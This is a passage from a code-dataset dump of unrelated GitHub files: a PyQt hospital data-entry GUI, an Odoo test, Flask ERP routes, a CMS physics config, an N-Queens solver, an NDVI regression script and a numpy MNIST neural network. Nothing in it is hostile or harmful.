self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.Pa_Info_current_index = 0\n\n @pyqtSlot()\n def on_radioButton_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['EditCase'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n def on_radioButton_6_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['DeleteService'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n #完成按钮\n def on_pushButton_5_clicked(self):\n if self.Pa_Info_current_index == len(self.Pa_Info_path_arry)-1:\n if True == self.Check_EditCase():\n if self.Save_Case():\n self.setFixedSize(441, 484)\n self.pushButton.setVisible(True)\n self.pushButton_2.setVisible(True)\n self.pushButton_4.setVisible(False)\n self.pushButton_5.setVisible(False)\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.MauUpload.setEnabled(True)\n else:\n self.statusBar.showMessage('保存信息到:%s失败!'%self.Pa_Info_Current_Path)\n\n\n def eventFilter(self, obj, event):\n if event.type() == QEvent.FocusIn:\n if obj == self.lineEdit_5:\n self.statusBar.showMessage('如果新生儿没取名字,可输入XXX子或XXX女')\n # self.lineEdit_5.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_3:\n self.statusBar.showMessage('联系电话必填!')\n self.lineEdit_3.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit:\n self.statusBar.showMessage('母亲姓名必填!')\n self.lineEdit.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_6:\n self.statusBar.showMessage('出生日期必填!')\n self.lineEdit_6.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_15:\n self.statusBar.showMessage('出生体重必填!')\n self.lineEdit_15.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_20:\n self.statusBar.showMessage('出生胎龄必填!')\n self.lineEdit_20.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_24:\n self.statusBar.showMessage('住院号与就诊号不能同时为空!')\n self.lineEdit_24.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_7:\n self.statusBar.showMessage('住院号与就诊号不能同时为空!')\n self.lineEdit_7.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif event.type() == QEvent.FocusOut:\n self.statusBar.showMessage('')\n else:\n pass\n return False\n\n @pyqtSlot()\n # 下一步按钮\n def on_pushButton_4_clicked(self):\n if self.Pa_Info_current_index < len(self.Pa_Info_path_arry) - 1:\n # print(self.Pa_Info_current_index)\n if True == self.Check_EditCase():\n self.statusBar.showMessage(\n '共%d个案例,正在处理第%d个案例' % (len(self.Pa_Info_path_arry), self.Pa_Info_current_index + 2))\n if self.Save_Case():\n self.Pa_Info_Current_Path = self.Pa_Info_path_arry[self.Pa_Info_current_index]\n self.Init_EditCase(self.Pa_Info_Current_Path)\n if self.Pa_Info_current_index == len(self.Pa_Info_path_arry) - 1:\n self.pushButton_4.setEnabled(False)\n self.pushButton_5.setEnabled(True)\n\n else:\n if 0 == self.Pa_Info_current_index:\n self.statusBar.showMessage('共%d个案例,正在处理第%d个案例' % (len(self.Pa_Info_path_arry), 1))\n # self.setFixedSize(441, 484)\n # self.pushButton.setVisible(True)\n # self.pushButton_2.setVisible(True)\n # self.pushButton_4.setVisible(False)\n # self.pushButton_5.setVisible(False)\n # self.Init_EditCase(self.Pa_Info_path_arry[self.Pa_Info_current_index])\n # if self.Pa_Info_current_index == len(self.Pa_Info_path_arry):\n # self.pushButton_4.setEnabled(False)\n\n @pyqtSlot(str)\n def on_comboBox_2_currentIndexChanged(self, p0):\n _translate = QtCore.QCoreApplication.translate\n if p0 in ['双','三','四']:\n self.groupBox_4.setVisible(True)\n else:\n self.groupBox_4.setVisible(False)\n if p0 =='双':\n self.radioButton_2.setText(_translate(\"MainWindow\", \"2-1\"))\n self.radioButton_3.setText(_translate(\"MainWindow\", \"2-2\"))\n self.radioButton_4.setVisible(False)\n self.radioButton_5.setVisible(False)\n elif p0 =='三':\n self.radioButton_2.setText(_translate(\"MainWindow\", \"3-1\"))\n self.radioButton_3.setText(_translate(\"MainWindow\", \"3-2\"))\n self.radioButton_4.setText(_translate(\"MainWindow\", \"3-3\"))\n self.radioButton_4.setVisible(True)\n self.radioButton_5.setVisible(False)\n elif p0 =='四':\n self.radioButton_2.setText(_translate(\"MainWindow\", \"4-1\"))\n self.radioButton_3.setText(_translate(\"MainWindow\", \"4-2\"))\n self.radioButton_4.setText(_translate(\"MainWindow\", \"4-3\"))\n self.radioButton_5.setText(_translate(\"MainWindow\", \"4-4\"))\n self.radioButton_4.setVisible(True)\n self.radioButton_5.setVisible(True)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n MainWindow2 = QtWidgets.QMainWindow()\n ui = MainWindow(MainWindow2)\n ui.show()\n sys.exit(app.exec_())\n \n","repo_name":"gesila820826/hospital_data_client-master","sub_path":"gui/src/hospital_upload.py","file_name":"hospital_upload.py","file_ext":"py","file_size_in_byte":50239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71381453696","text":"from lxml import etree\n\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestBaseViewInheritanceExtension(TransactionCase):\n def test_base_view_inheritance_extension(self):\n view_id = self.env.ref(\"base.view_partner_simple_form\").id\n fields_view_get = self.env[\"res.partner\"].fields_view_get(view_id=view_id)\n view = etree.fromstring(fields_view_get[\"arch\"])\n # verify normal attributes work\n self.assertEqual(view.xpath(\"//form\")[0].get(\"string\"), \"Partner form\")\n # verify our extra context key worked\n self.assertTrue(\n \"default_name\" in view.xpath('//field[@name=\"parent_id\"]')[0].get(\"context\")\n )\n self.assertTrue(\n \"context.get('company_id', context.get('company'))\"\n in view.xpath('//field[@name=\"parent_id\"]')[0].get(\"context\")\n )\n\n def test_list_add(self):\n view_model = self.env[\"ir.ui.view\"]\n source = etree.fromstring(\n \"\"\"\\\n
\n
\n \"\"\"\n )\n modified_source = view_model.inheritance_handler_attributes_list_add(\n source, specs\n )\n button_node = modified_source.xpath('//button[@name=\"test\"]')[0]\n self.assertEqual(button_node.attrib[\"states\"], \"draft,open,valid\")\n # extend with list of values\n specs = etree.fromstring(\n \"\"\"\\\n \n \"\"\"\n )\n modified_source = view_model.inheritance_handler_attributes_list_add(\n source, specs\n )\n button_node = modified_source.xpath('//button[@name=\"test\"]')[0]\n self.assertEqual(button_node.attrib[\"states\"], \"draft,open,valid,payable,paid\")\n\n def test_list_remove(self):\n view_model = self.env[\"ir.ui.view\"]\n source = etree.fromstring(\n \"\"\"\\\n
\n
\n \"\"\"\n )\n modified_source = view_model.inheritance_handler_attributes_list_remove(\n source, specs\n )\n button_node = modified_source.xpath('//button[@name=\"test\"]')[0]\n self.assertEqual(button_node.attrib[\"states\"], \"draft,valid,paid\")\n\n def test_python_dict_inheritance(self):\n view_model = self.env[\"ir.ui.view\"]\n source = etree.fromstring(\n \"\"\"
\n \n \"\"\"\n )\n specs = etree.fromstring(\n \"\"\"\\\n \n my_value\n 'my name'\n cost_center_id\n \n \"\"\"\n )\n modified_source = view_model.inheritance_handler_attributes_python_dict(\n source, specs\n )\n field_node = modified_source.xpath('//field[@name=\"invoice_line_ids\"]')[0]\n self.assertTrue(\n \"currency_id != company_currency_id and currency_id or False\"\n in field_node.attrib[\"context\"]\n )\n self.assertTrue(\"my_value\" in field_node.attrib[\"context\"])\n self.assertFalse(\"'cost_center_id'\" in field_node.attrib[\"context\"])\n","repo_name":"dhongu/others_addons","sub_path":".unsed/base_view_inheritance_extension/tests/test_base_view_inheritance_extension.py","file_name":"test_base_view_inheritance_extension.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"32239081791","text":"# -*- coding: UTF-8 -*-\nimport json\nfrom flask import render_template, session, request\nfrom auth.login_required import login_required\nfrom auth.permission_required import permission_required\nfrom webapp import app\nfrom webapp.mylog import log\nfrom db.db_mission import *\n\n__author__ = 'sonnyhcl'\n\n\n@app.route('/mission', methods=['GET'])\n@login_required\ndef mission_index():\n return render_template('mission.html')\n\n\n@app.route('/mission/table', methods=['POST'])\n@login_required\ndef get_mission_by_cid():\n \"\"\"\n 返回社区c_id的任务信息\n c_id=0意味着返回所有任务信息\n :return: \n \"\"\"\n ret = {\"data\": [], \"status\": 'Success', \"msg\": \"\"}\n c_id = session.get('c_id')\n status, info = mission.get_mission_by_cid(c_id)\n if status == \"Success\":\n _ = [ret['data'].append({'m_id': i[0], 'm_amount': i[1], 'm_note': i[2],\n 'u_id': i[3], \"i_id\": i[4], \"o_id\": i[6],\n \"o_amount\": i[7], 'u_name': i[23],\n 'p_name': i[14], 'i_name': i[17]})\n for i in info\n if session['u_role'] == 'root' or session['u_role'] == 'admin'\n or (session['u_role'] == 'user' and session['u_id'] == i[3])\n ]\n else:\n ret['msg'] = info\n\n return json.dumps(ret, ensure_ascii=False)\n\n\n@app.route('/mission/add', methods=['POST'])\n@permission_required('admin')\n@login_required\ndef add_mission():\n \"\"\"\n\n :return: {\"status\": \"Success\", \"msg\":\"error_msg\"}\n \"\"\"\n ret = {\"status\": \"Success\", \"msg\": \"error_msg\"}\n u_id = request.form.get('u_id')\n i_id = request.form.get('i_id')\n o_id = request.form.get('o_id')\n m_amount = request.form.get('m_amount')\n m_note = request.form.get('m_note')\n ret['status'], ret['msg'] = \\\n mission.add_mission(u_id, i_id, o_id, m_amount, m_note)\n\n return json.dumps(ret, ensure_ascii=False)\n\n\n@app.route('/mission/modify', methods=['POST'])\n@permission_required('admin')\n@login_required\ndef modify_mission():\n \"\"\"\n\n :return: {\"status\": \"Success\", \"msg\":\"error_msg\"}\n \"\"\"\n ret = {\"status\": \"Success\", \"msg\": \"error_msg\"}\n\n m_id = request.form.get('m_id')\n m_amount = request.form.get('m_amount')\n m_note = request.form.get('m_note')\n u_id = request.form.get('u_id')\n i_id = request.form.get('i_id')\n o_id = request.form.get('o_id')\n ret['status'], ret['msg'] = \\\n mission.update_mission(m_id, m_amount, m_note, u_id, i_id, o_id)\n\n return json.dumps(ret, ensure_ascii=False)\n\n\n@app.route('/mission/delete', methods=['POST'])\n@permission_required('admin')\n@login_required\ndef delete_mission():\n \"\"\"\n\n :return: {\"status\": \"Success\", \"msg\":\"error_msg\"}\n \"\"\"\n ret = {\"status\": \"Success\", \"msg\": \"error_msg\"}\n m_id = request.form.get('m_id')\n ret['status'], ret['msg'] = mission.delete_mission(m_id)\n\n return json.dumps(ret, ensure_ascii=False)\n","repo_name":"sonnyhcl/Simple-ERP-System","sub_path":"webapp/views/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"16542232480","text":"\n##____________________________________________________________________________||\nfrom PhysicsTools.PatAlgos.patTemplate_cfg import *\n\n##____________________________________________________________________________||\nimport FWCore.ParameterSet.VarParsing as VarParsing\noptions = VarParsing.VarParsing('analysis')\noptions.inputFiles = 'file:/afs/cern.ch/cms/Tutorials/TWIKI_DATA/MET/TTJets_AODSIM_532_numEvent100.root', \noptions.outputFile = 'patTuple_typeI_pf2pat.root'\noptions.maxEvents = -1\noptions.parseArguments()\n\n##____________________________________________________________________________||\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(options.maxEvents))\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 10\n\n##____________________________________________________________________________||\nprocess.load(\"PhysicsTools.PatAlgos.patSequences_cff\")\n\n##____________________________________________________________________________||\nfrom PhysicsTools.PatAlgos.tools.pfTools import *\n\n##____________________________________________________________________________||\nprocess.load(\"PhysicsTools.PatUtils.patPFMETCorrections_cff\")\nprocess.producePatPFMETCorrections.replace(\n process.pfCandMETcorr,\n process.type0PFMEtCorrection *\n process.patPFMETtype0Corr *\n process.pfCandMETcorr \n )\n\npostfix = \"PFlow\"\njetAlgo=\"AK5\"\nusePF2PAT(process, \n runPF2PAT = True,\n jetAlgo = jetAlgo,\n runOnMC = True,\n postfix = postfix, \n typeIMetCorrections = True\n )\n\ngetattr(process,'patMETs'+postfix).metSource = cms.InputTag(\"patType1CorrectedPFMet\"+postfix)\n\ngetattr(process,'patType1CorrectedPFMet'+postfix).srcType1Corrections = cms.VInputTag(\n cms.InputTag(\"patPFJetMETtype1p2Corr\"+postfix,\"type1\"),\n cms.InputTag(\"patPFMETtype0Corr\"+postfix)\n)\n\n##____________________________________________________________________________||\nprocess.source = cms.Source(\n \"PoolSource\",\n fileNames = cms.untracked.vstring(options.inputFiles)\n )\n\n##____________________________________________________________________________||\n# process.p = cms.Path(\n# process.type0PFMEtCorrection *\n# process.patDefaultSequence\n# )\n\nprocess.p = cms.Path(\n getattr(process,\"patPF2PATSequence\"+postfix)\n)\n\n##____________________________________________________________________________||\nprocess.out.fileName = cms.untracked.string(options.outputFile)\nprocess.out.outputCommands = cms.untracked.vstring(\n 'keep *',\n # 'drop *',\n # 'keep patMETs_patMETs__PAT',\n ) \n\n##____________________________________________________________________________||\n","repo_name":"TaiSakuma/metrecoat","sub_path":"python_typeI_pf2pat_cfg.py","file_name":"python_typeI_pf2pat_cfg.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12695731609","text":"class Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n \"\"\"\n General idea: Fill boards by row using while loop and a list of boards\n 1. Initialize board - list of boards with all options to occupy first row. Store there a tuple of (row, column). \n 2. Use while loop until boards will become empty: all boards will be filled up until last row and will be appended to the list of results\n 1. Pop a board from boards\n 2. If the size is n - it's already full -> append to res\n 3. Iterate through possible values for the column and append to board possible (row, column), where row - is the size of board and is also current row. \n \"\"\"\n boards = [[(0, i)] for i in range(n)]\n res = []\n while boards:\n board = boards.pop()\n row = len(board)\n if row == n:\n res.append([\n ''.join('Q' if i == c else '.' for i in range(n))\n for r, c in board])\n for column in range(n):\n if all(column != c and abs(column - c) != abs(row - r) for r, c in board):\n boards.append(board + [(row, column)])\n return res\n ","repo_name":"Margarita89/LeetCode","sub_path":"0051_N-Queens.py","file_name":"0051_N-Queens.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24498141505","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 21 12:49:23 2021\r\n\r\n@author: brian\r\n\"\"\"\r\n\r\n#import Packages\r\nimport csv\r\nimport numpy as np\r\nimport pandas as pd\r\nimport datetime as dt\r\nimport scipy.stats\r\nimport statsmodels.api as sm\r\nimport statsmodels.formula.api as smf\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom math import sqrt\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\n\r\n#import EVI data\r\nNDVI = pd.read_csv (r'C:\\Users\\brian\\OneDrive\\Desktop\\SIP\\Data\\Sandy_3_Allotment\\S3_WB_NDVI.csv')\r\n\r\n#change date to datetime\r\nNDVI['date'] = pd.to_datetime(NDVI['date']).dt.tz_localize(None)\r\n\r\n#drop NA values\r\nNDVI.dropna(subset = ['scaled NDVI3'], inplace = True)\r\n\r\n\r\n###Calculate R2 and MSE for periodic values\r\n\r\n#create blank dataframe of just growing season data\r\nGS = pd.DataFrame()\r\nPeriod = [5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]\r\nDates = ['March 6 - March 21', 'March 22 - April 6', 'April 7 - April 22', 'April 23 - May 8', 'May 9 - May 24', 'May 25 - June 9', 'June 10 - June 25', 'June 26 - July 11', 'July 12 - July 27', 'July 28 - August 12', 'August 13 - August 28', 'August 29 - September 13', 'September 14 - September 29', 'September 30 - October 14', 'October 15 - October 31']\r\nGS['Date Range'] = Dates\r\nGS['Period'] = Period\r\nGS['r^2 of Deficit vs. EVI'] = np.nan\r\nGS['r^2 of AET vs. EVI'] = np.nan\r\nGS['r^2 of SM vs. EVI'] = np.nan\r\nGS['r^2 of MELT vs. EVI'] = np.nan\r\nGS['r^2 of W vs. EVI'] = np.nan\r\nGS['rMSE of Deficit vs. EVI'] = np.nan \r\nGS['rMSE of AET vs. EVI'] = np.nan\r\nGS['rMSE of SM vs. EVI'] = np.nan\r\nGS['rMSE of MELT vs. EVI'] = np.nan\r\nGS['rMSE of W vs. EVI'] = np.nan\r\nGS['AIC of Deficit vs. EVI'] = np.nan \r\nGS['AIC of AET vs. EVI'] = np.nan\r\nGS['AIC of SM vs. EVI'] = np.nan\r\nGS['AIC of MELT vs. EVI'] = np.nan\r\nGS['AIC of W vs. EVI'] = np.nan\r\n\r\n#Create a blank dataframe that stores the best relationship slope intercept and r2 value\r\nBest = pd.DataFrame()\r\nBest['Date Range'] = Dates\r\nBest['Period'] = Period\r\nBest['Best Predictor(s)'] = ''\r\nBest['r^2'] = np.nan\r\nBest['rMSE'] = np.nan\r\nBest['AIC'] = np.nan\r\n \r\n\r\n# loop through the data and Calculate R2 and MSE for all of the different periods\r\n\r\nfor i in range(5,20,1):\r\n \r\n EVI_p = NDVI[NDVI[\"Period\"] == i]\r\n \r\n \r\n ####Deficit Vs. EVI\r\n X_trainD, X_testD, y_trainD, y_testD = train_test_split(EVI_p['Sum of D'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeD, interceptD, r_valueD, p_valueD, std_errD = scipy.stats.linregress(X_trainD, y_trainD)\r\n r2D = ((r_valueD**2))\r\n GS.at[i-5,'r^2 of Deficit vs. EVI'] =r2D\r\n\r\n #try relationship with test data\r\n y_predictD = (slopeD*X_testD) + interceptD\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICD = 2 - (2*np.log((sum((y_testD-y_predictD)**2))))\r\n GS.at[i-5,'AIC of Deficit vs. EVI'] = AICD\r\n rMSED = sqrt(mean_squared_error(y_testD, y_predictD))\r\n GS.at[i-5,'rMSE of Deficit vs. EVI'] = rMSED\r\n\r\n\r\n ###AET vs EVI\r\n X_trainA, X_testA, y_trainA, y_testA = train_test_split(EVI_p['Sum of AET'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeA, interceptA, r_valueA, p_valueA, std_errA = scipy.stats.linregress(X_trainA, y_trainA)\r\n r2A = ((r_valueA**2))\r\n GS.at[i-5,'r^2 of AET vs. EVI'] =r2A\r\n\r\n #try relationship with test data\r\n y_predictA = (slopeA*X_testA) + interceptA\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICA = 2 - (2*np.log((sum((y_testA-y_predictA)**2))))\r\n GS.at[i-5,'AIC of AET vs. EVI'] = AICA\r\n rMSEA = sqrt(mean_squared_error(y_testA, y_predictA))\r\n GS.at[i-5,'rMSE of AET vs. EVI'] = rMSEA\r\n\r\n\r\n ###SM vs. EVI\r\n X_trainS, X_testS, y_trainS, y_testS = train_test_split(EVI_p['Average of SOIL'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeS, interceptS, r_valueS, p_valueS, std_errS = scipy.stats.linregress(X_trainS, y_trainS)\r\n r2S = ((r_valueS**2))\r\n GS.at[i-5,'r^2 of SM vs. EVI'] =r2S\r\n\r\n #try relationship with test data\r\n y_predictS = (slopeS*X_testS) + interceptS\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICS = 2 - (2*np.log((sum((y_testS-y_predictS)**2))))\r\n GS.at[i-5,'AIC of SM vs. EVI'] = AICS\r\n rMSES = sqrt(mean_squared_error(y_testS, y_predictS))\r\n GS.at[i-5,'rMSE of SM vs. EVI'] = rMSES\r\n \r\n \r\n ###W vs. EVI\r\n X_trainW, X_testW, y_trainW, y_testW = train_test_split(EVI_p['Sum of W'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeW, interceptW, r_valueW, p_valueW, std_errW = scipy.stats.linregress(X_trainW, y_trainW)\r\n r2W = ((r_valueW**2))\r\n GS.at[i-5,'r^2 of W vs. EVI'] =r2W\r\n\r\n #try relationship with test data\r\n y_predictW = (slopeW*X_testW) + interceptW\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICW = 2 - (2*np.log((sum((y_testW-y_predictW)**2))))\r\n GS.at[i-5,'AIC of W vs. EVI'] = AICW\r\n rMSEW = sqrt(mean_squared_error(y_testW, y_predictW))\r\n GS.at[i-5,'rMSE of W vs. EVI'] = rMSEW\r\n \r\n ###Figure out the best model fit for each period\r\n list = [r2D, r2A, r2S, r2W]\r\n best_r2 = list.index(max(list))\r\n \r\n if best_r2 == 0:\r\n Best.at[i-5,'Best Predictor(s)'] = 'Deficit (D)'\r\n Best.at[i-5,'r^2'] = r2D\r\n Best.at[i-5,'Intercept'] = interceptD\r\n Best.at[i-5,'Coefficient'] = slopeD\r\n Best.at[i-5,'AIC'] = AICD\r\n Best.at[i-5,'rMSE'] = rMSED\r\n \r\n \r\n elif best_r2 ==1 :\r\n Best.at[i-5,'Best Predictor(s)'] = 'AET'\r\n Best.at[i-5,'r^2'] = r2A\r\n Best.at[i-5,'Intercept'] = interceptA\r\n Best.at[i-5,'Coefficient'] = slopeA\r\n Best.at[i-5,'AIC'] = AICA\r\n Best.at[i-5,'rMSE'] = rMSEA\r\n \r\n \r\n elif best_r2 ==2:\r\n Best.at[i-5,'Best Predictor(s)'] = 'Soil Moisture (SM)'\r\n Best.at[i-5,'r^2'] = r2S\r\n Best.at[i-5,'Intercept'] = interceptS\r\n Best.at[i-5,'Coefficient'] = slopeS\r\n Best.at[i-5,'AIC'] = AICS\r\n Best.at[i-5,'rMSE'] = rMSES\r\n \r\n \r\n elif best_r2 ==3:\r\n Best.at[i-5,'Best Predictor(s)'] = 'W'\r\n Best.at[i-5,'r^2'] = r2W\r\n Best.at[i-5,'Intercept'] = interceptW\r\n Best.at[i-5,'Coefficient'] = slopeW\r\n Best.at[i-5,'AIC'] = AICW\r\n Best.at[i-5,'rMSE'] = rMSEW\r\n","repo_name":"Schlaff/SIP","sub_path":"Sandy3 Allotment/NDVI_WB_Relationships.py","file_name":"NDVI_WB_Relationships.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73169100415","text":"from util import *\nfrom mnist_loader import load_mnist\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\nnp.random.seed(34)\n\ndef np_log(x):\n return np.log(np.clip(x, 1e-10, x))\n\n\n# cross entropy error\ndef calc_loss(t, y):\n return - (t * np_log(y)).sum(axis=1).mean()\n\n\n# Stochastic Gradient Descent\nclass SGD:\n def __init__(self, lr=0.01):\n self.lr = lr\n\n def update_params(self, w1, w2, b1, b2, dw1, dw2, db1, db2):\n w2 -= self.lr * dw2\n w1 -= self.lr * dw1\n b2 -= self.lr * db2\n b1 -= self.lr * db1\n return w1, w2, b1, b2\n\n\nclass Momentum:\n def __init__(self, lr=0.01, momentum=0.9):\n self.lr = lr\n self.momentum = momentum\n self.is_initialized = False\n self.v_w1 = None\n self.v_w2 = None\n self.v_b1 = None\n self.v_b2 = None\n\n def update_params(self, w1, w2, b1, b2, dw1, dw2, db1, db2):\n if not self.is_initialized:\n self.v_w1 = np.zeros_like(w1)\n self.v_w2 = np.zeros_like(w2)\n self.v_b1 = np.zeros_like(b1)\n self.v_b2 = np.zeros_like(b2)\n self.is_initialized = True\n\n self.v_w1 = self.momentum * self.v_w1 - self.lr * dw1\n w1 = w1 + self.v_w1\n\n self.v_w2 = self.momentum * self.v_w2 - self.lr * dw2\n w2 = w2 + self.v_w2\n\n self.v_b1 = self.momentum * self.v_b1 - self.lr * db1\n b1 = b1 + self.v_b1\n\n self.v_b2 = self.momentum * self.v_b2 - self.lr * db2\n b2 = b2 + self.v_b2\n\n return w1, w2, b1, b2\n\n\nclass AdaGrad:\n def __init__(self, lr=0.01):\n self.lr = lr\n self.is_initialized = False\n self.h_w1 = None\n self.h_w2 = None\n self.h_b1 = None\n self.h_b2 = None\n\n def update_params(self, w1, w2, b1, b2, dw1, dw2, db1, db2):\n if not self.is_initialized:\n self.h_w1 = np.zeros_like(w1)\n self.h_w2 = np.zeros_like(w2)\n self.h_b1 = np.zeros_like(b1)\n self.h_b2 = np.zeros_like(b2)\n self.is_initialized = True\n\n # 勾配の二乗を加算していく\n self.h_w1 = self.h_w1 + dw1 * dw1\n w1 = w1 - self.lr * dw1 / (np.sqrt(self.h_w1) + 1e-7)\n\n self.h_w2 = self.h_w2 + dw2 * dw2\n w2 = w2 - self.lr * dw2 / (np.sqrt(self.h_w2) + 1e-7)\n\n self.h_b1 = self.h_b1 + db1 * db1\n b1 = b1 - self.lr * db1 / (np.sqrt(self.h_b1) + 1e-7)\n\n self.h_b2 = self.h_b2 + db2 * db2\n b2 = b2 - self.lr * db2 / (np.sqrt(self.h_b2) + 1e-7)\n\n return w1, w2, b1, b2\n\n\ndef initialize_weights_lucun_uniform(dim1, dim2):\n return np.random.uniform(low=-np.sqrt(1.0/dim1),\n high=np.sqrt(1.0/dim1),\n size=(dim1, dim2)).astype('float32')\n\n\ndef initialize_weights_xavier_uniform(dim1, dim2):\n return np.random.uniform(low=-np.sqrt(6.0/(dim1 + dim2)),\n high=np.sqrt(6.0/(dim1 + dim2)),\n size=(dim1, dim2)).astype('float32')\n\n\ndef initialize_weights_he_normal(dim1, dim2):\n return np.sqrt(2.0 / dim1) * np.random.normal(size=(dim1, dim2))\n\n\nclass TwoLayerNet:\n def __init__(self, optimizer):\n self.optimizer = optimizer\n self.layer1 = None\n self.relu_layer = None\n self.layer2 = None\n self.softmax_with_loss_layer = None\n\n def train(self, x, t):\n # forward\n y = self._forward(x)\n\n # backward\n delta2 = self.softmax_with_loss_layer.backward(y, t)\n dx2 = self.layer2.backward(delta2)\n delta1 = self.relu_layer.backward(dx2)\n self.layer1.backward(delta1)\n\n # get new params\n w1, w2, b1, b2 = self.optimizer.update_params(\n w1=self.layer1.w,\n w2=self.layer2.w,\n b1=self.layer1.b,\n b2=self.layer2.b,\n dw1=self.layer1.dw,\n dw2=self.layer2.dw,\n db1=self.layer1.db,\n db2=self.layer2.db)\n\n # update params\n self.layer1.w = w1\n self.layer1.b = b1\n self.layer2.w = w2\n self.layer2.b = b2\n\n\n def predict(self, x):\n return self._forward(x)\n\n\n def _forward(self, x):\n u1 = self.layer1.forward(x)\n h1 = self.relu_layer.forward(u1)\n u2 = self.layer2.forward(h1)\n return self.softmax_with_loss_layer.forward(u2)\n\n\nclass Dense:\n def __init__(self, n_in, n_out):\n self.w = initialize_weights_he_normal(n_in, n_out)\n self.b = np.zeros(n_out).astype('float32')\n self.dw = None\n self.db = None\n self.x = None\n self.u = None\n\n def forward(self, x):\n self.x = x\n self.u = np.matmul(x, self.w) + self.b\n return self.u\n\n def backward(self, delta):\n self.dw = np.matmul(self.x.T, delta)\n self.db = np.sum(delta, axis=0) # sum for batch\n dx = np.matmul(delta, self.w.T)\n return dx\n\n\nclass SoftmaxWithLoss:\n def forward(self, x):\n return softmax(x)\n\n def backward(self, y, t):\n batch_size = y.shape[0]\n return y - t / batch_size # div for batch\n\n\nclass Relu:\n def __init__(self):\n self.x = None\n\n def forward(self, x):\n self.x = x\n return relu(self.x)\n\n def backward(self, dx):\n return dx * deriv_relu(self.x)\n\n\n# load datas\nx_train, t_train, x_test, t_test = load_mnist()\n\n# normalize\nx_train = x_train / 255\nx_test = x_test / 255\n\n# convert to one-hot\nt_train = np.eye(10)[t_train]\n\n# train valid split\nx_train, x_valid, t_train, t_valid = train_test_split(x_train, t_train, test_size=0.2)\n#x_train, t_train, x_test, t_test = x_train[0:101], t_train[0:101], x_test[0:101], t_test[0:101]\n\n\n# build network\nnetwork = TwoLayerNet(optimizer=SGD(lr=0.01))\nnetwork.layer1 = Dense(784, 100)\nnetwork.relu_layer = Relu()\nnetwork.layer2 = Dense(100, 10)\nnetwork.softmax_with_loss_layer = SoftmaxWithLoss()\n\n# loop epoch\nepochs = 3\nbatch_size = 50\nn_batch = len(x_train) // batch_size\n\nprint(\"start train...epochs: {}\".format(epochs))\nfor epoch in range(epochs):\n x_train, t_train = shuffle(x_train, t_train)\n\n # train\n for i in range(n_batch):\n start = batch_size * i\n end = start + batch_size\n x = x_train[start:end]\n t = t_train[start:end]\n network.train(x, t)\n\n # train loss, acc\n y_train = network.predict(x_train)\n train_loss = calc_loss(t_train, y_train)\n train_acc = accuracy_score(y_train.argmax(axis=1), t_train.argmax(axis=1))\n\n # validation loss, acc\n y_valid = network.predict(x_valid)\n valid_loss = calc_loss(t_valid, y_valid)\n valid_acc = accuracy_score(y_valid.argmax(axis=1), t_valid.argmax(axis=1))\n print(\"[epoch {}] train loss: {:.3f}, train acc: {:.3f}, valid loss: {:.3f}, valid acc: {:.3f}\".format(\n epoch, train_loss, train_acc, valid_loss, valid_acc))\n\n\nprint(\"start predict..\")\ny_test = network.predict(x_test)\nacc = 